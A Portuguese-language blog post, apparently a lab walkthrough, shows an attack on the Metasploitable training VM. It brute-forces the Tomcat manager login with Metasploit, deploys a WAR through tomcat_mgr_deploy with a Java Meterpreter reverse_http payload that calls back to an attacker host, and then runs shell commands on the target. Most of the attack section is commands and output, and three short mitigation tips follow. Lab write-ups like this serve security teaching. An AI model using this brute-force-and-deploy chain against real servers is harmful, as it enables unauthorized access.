+ — – =[ 251 payloads - 28 encoders - 8 nops]
msf> search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
Opa temos alguns exploits interessantes. Vamos usar o tomcat_mgr_login para fazer um bruteforce. Antes de invadir precisamos de um user/pass válido.
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf (tomcat_mgr_login)> show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
Bom, esse exploit precisa de bastante coisas. Vamos acrescentar o host que encontramos antes, a porta (lembra qual era? Sempre preste atenção nisso), caso ele não encontre com os usuarios e senhas padrão vamos acrescentar nossas wordlists em PASS_FILE e USER_FILE e caso ele não encontre no diretório padrão precisaremos mudar isso também em URI.
msf (tomcat_mgr_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf (tomcat_mgr_login) > set RHOSTS 192.168.0.108
RHOSTS => 192.168.0.108
msf (tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_login) > exploit
[*][192.168.0.108:8180 TOMCAT_MGR - [01/45] – Trying username:’admin’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [01/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [02/45] – Trying username:’manager’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [02/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [03/45] – Trying username:’role1′ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [03/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [04/45] – Trying username:’root’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [04/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [05/45] – Trying username:’tomcat’ with password:’tomcat’
[+][http://192.168.0.108:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’
[*][192.168.0.108:8180 TOMCAT_MGR - [06/45] – Trying username:’both’ with password:’both’
[-][192.168.0.108:8180 TOMCAT_MGR - [06/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [07/45] – Trying username:’j2deployer’ with password:’j2deployer’
[-][192.168.0.108:8180 TOMCAT_MGR - [07/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*][192.168.0.108:8180 TOMCAT_MGR - [08/45] – Trying username:’ovwebusr’ with password:’ovwebusr’
[-][192.168.0.108:8180 TOMCAT_MGR - [08/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*][192.168.0.108:8180 TOMCAT_MGR - [09/45] – Trying username:’cxsdk’ with password:’cxsdk’
[-][192.168.0.108:8180 TOMCAT_MGR - [09/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*][192.168.0.108:8180 TOMCAT_MGR - [10/45] – Trying username:’ADMIN’ with password:’ADMIN’
[-][192.168.0.108:8180 TOMCAT_MGR - [10/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*][192.168.0.108:8180 TOMCAT_MGR - [11/45] – Trying username:’xampp’ with password:’xampp’
[-][192.168.0.108:8180 TOMCAT_MGR - [11/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*][192.168.0.108:8180 TOMCAT_MGR - [12/45] – Trying username:’ovwebusr’ with password:’OvW*busr1′
[-][192.168.0.108:8180 TOMCAT_MGR - [12/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*][192.168.0.108:8180 TOMCAT_MGR - [13/45] – Trying username:’cxsdk’ with password:’kdsxc’
[-][192.168.0.108:8180 TOMCAT_MGR - [13/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*][192.168.0.108:8180 TOMCAT_MGR - [14/45] – Trying username:’root’ with password:’owaspbwa’
[-][192.168.0.108:8180 TOMCAT_MGR - [14/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [15/45] – Trying username:’admin’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [15/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [16/45] – Trying username:’admin’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [16/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [17/45] – Trying username:’admin’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [17/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [18/45] – Trying username:’admin’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [18/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [19/45] – Trying username:’admin’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [19/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*][192.168.0.108:8180 TOMCAT_MGR - [20/45] – Trying username:’manager’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [20/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [21/45] – Trying username:’manager’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [21/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [22/45] – Trying username:’manager’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [22/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [23/45] – Trying username:’manager’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [23/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [24/45] – Trying username:’manager’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [24/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*][192.168.0.108:8180 TOMCAT_MGR - [25/45] – Trying username:’role1′ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [25/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [26/45] – Trying username:’role1′ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [26/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [27/45] – Trying username:’role1′ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [27/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [28/45] – Trying username:’role1′ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [28/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [29/45] – Trying username:’role1′ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [29/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*][192.168.0.108:8180 TOMCAT_MGR - [30/45] – Trying username:’root’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [30/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [31/45] – Trying username:’root’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [31/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [32/45] – Trying username:’root’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [32/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [33/45] – Trying username:’root’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [33/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [34/45] – Trying username:’root’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [34/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*][192.168.0.108:8180 TOMCAT_MGR - [35/45] – Trying username:’both’ with password:’admin’
[-][192.168.0.108:8180 TOMCAT_MGR - [35/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [36/45] – Trying username:’both’ with password:’manager’
[-][192.168.0.108:8180 TOMCAT_MGR - [36/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [37/45] – Trying username:’both’ with password:’role1′
[-][192.168.0.108:8180 TOMCAT_MGR - [37/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [38/45] – Trying username:’both’ with password:’root’
[-][192.168.0.108:8180 TOMCAT_MGR - [38/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [39/45] – Trying username:’both’ with password:’tomcat’
[-][192.168.0.108:8180 TOMCAT_MGR - [39/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][192.168.0.108:8180 TOMCAT_MGR - [40/45] – Trying username:’both’ with password:’s3cret’
[-][192.168.0.108:8180 TOMCAT_MGR - [40/45] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*][Scanned 1 of 1 hosts (100% complete)
[*][Auxiliary module execution completed
Opa! Se analizar bem essa saída podemos ver que com a wordlist padrão já encontramos uma combinação user:pass (tomcat:tomcat). Nem vamos precisar de wordlist nesse caso. Ele também encontrou que o diretório padrão é válido, logo, não precisamos testar outro. Então agora vamos procurar nosso exploit de verdade.
msf (tomcat_mgr_login) > search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
O exploit que nós vamos usar é o mgr_deploy, com um payload reverse_http. Vamos preencher com as informações que já conseguimos.
msf (tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf (tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf (tomcat_mgr_deploy) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf (tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf (tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf (tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf (tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf (tomcat_mgr_deploy) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf (tomcat_mgr_deploy) > exploit
[*][Started HTTP reverse handler on http://192.168.0.106:8443/
[*][Attempting to automatically select a target...
[*][Automatically selected target "Linux x86"
[*][Uploading 6465 bytes as D3YHKcK8TOful.war ...
[*][Executing /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp...
[*][Undeploying D3YHKcK8TOful ...
[*][192.168.0.108:51231 Request received for /INITJM...
Java: /INITJM
URL: "http://192.168.0.106:8443/FDnj_4IdkGPMI9c8doStx/\x00"
[*][Meterpreter session 2 opened (192.168.0.106:8443 -> 192.168.0.108:51231) at 2012-08-24 20:37:12 -0300
meterpreter >
Pronto! Conseguimos, estamos dentro, vamos rodar alguns comandos para confirmar.
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > ifconfig
Interface 1
============
Name : lo – lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 – eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.0.108
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe45:2ce8
IPv6 Netmask : ::
meterpreter > shell
Process 1 created.
Channel 1 created.
$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
$ whoami
tomcat55
$ ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
$ cd /tmp
$ pwd
/tmp
$ ls
4729.jsvc_up
cache37pgy7jar
cache37pgy8jar
$ halt
halt: Need to be root
E estamos mesmo dentro! Podemos ver pelo comando whoami que estamos no user tomcat55. Podemos passear e utilizar alguns comandos no sistema, mas não temos muitos privilégios. Pode-se notar isso no último comando que retornou “Need to be root”. Precisamos escalar privilégios e conseguir acesso root para brincar mais.
Mas essa parte fica para outro post, já que esse era apenas para conhecer a vulnerabilidade e os exploits.
Evitando o ataque
Opa descobri como atacar e por onde que se entra, mas e agora, como eu arrumo isso?
Bom, não se tem muita coisa a fazer nesse ponto, mas vamos a elas:
- Mantenha sempre o Apache Tomcat atualizado
- Não use senhas óbvias
- Se possível mude o diretório para algo menos óbvio
Por hoje era isso! Já vimos 1 das falhas do Metasploitable, já já teremos mais.
0 comentários:
Postar um comentário